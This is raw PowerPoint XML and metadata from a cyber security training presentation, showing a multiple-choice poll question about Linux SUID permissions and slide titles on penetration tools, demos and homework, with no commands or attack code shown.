              <a:t> U Cyber Security Program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lee@mcwhortertechnologies.com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9796" y="1181152"/>
            <a:ext cx="1777004" cy="17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7881" y="354079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31071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2859" y="1200151"/>
            <a:ext cx="2540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as a normal user on a Linux computer run a program and it runs with root user permissions, what permission has been set on this file?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Sudo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SGID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SUID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Root Exec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3626</TotalTime>
  <Words>1995</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>442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Housekeeping</vt:lpstr>
      <vt:lpstr>Take Control of Your Console</vt:lpstr>
      <vt:lpstr>Welcome to the Train-the-Trainer Series</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Slide 6</vt:lpstr>
      <vt:lpstr>Slide 7</vt:lpstr>
      <vt:lpstr>Welcome</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.1</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.1</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.1</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.1</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.1</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.1</vt:lpstr>
      <vt:lpstr>Chat Question</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.1</vt:lpstr>
      <vt:lpstr>Slide 23</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.2</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.2</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.2</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference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4.2</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.3</vt:lpstr>
      <vt:lpstr>Penetration Tools – Domain 4.3</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>POLL</vt:lpstr>
      <vt:lpstr>Homework for next class!</vt:lpstr>
      <vt:lpstr>Next Class!</vt:lpstr>
      <vt:lpstr>Discussion time: Please type your questions in chat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Lee</cp:lastModifiedBy>
  <cp:revision>249</cp:revision>
  <cp:lastPrinted>2013-07-30T16:42:49Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-12T23:12:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-24T06:14:20Z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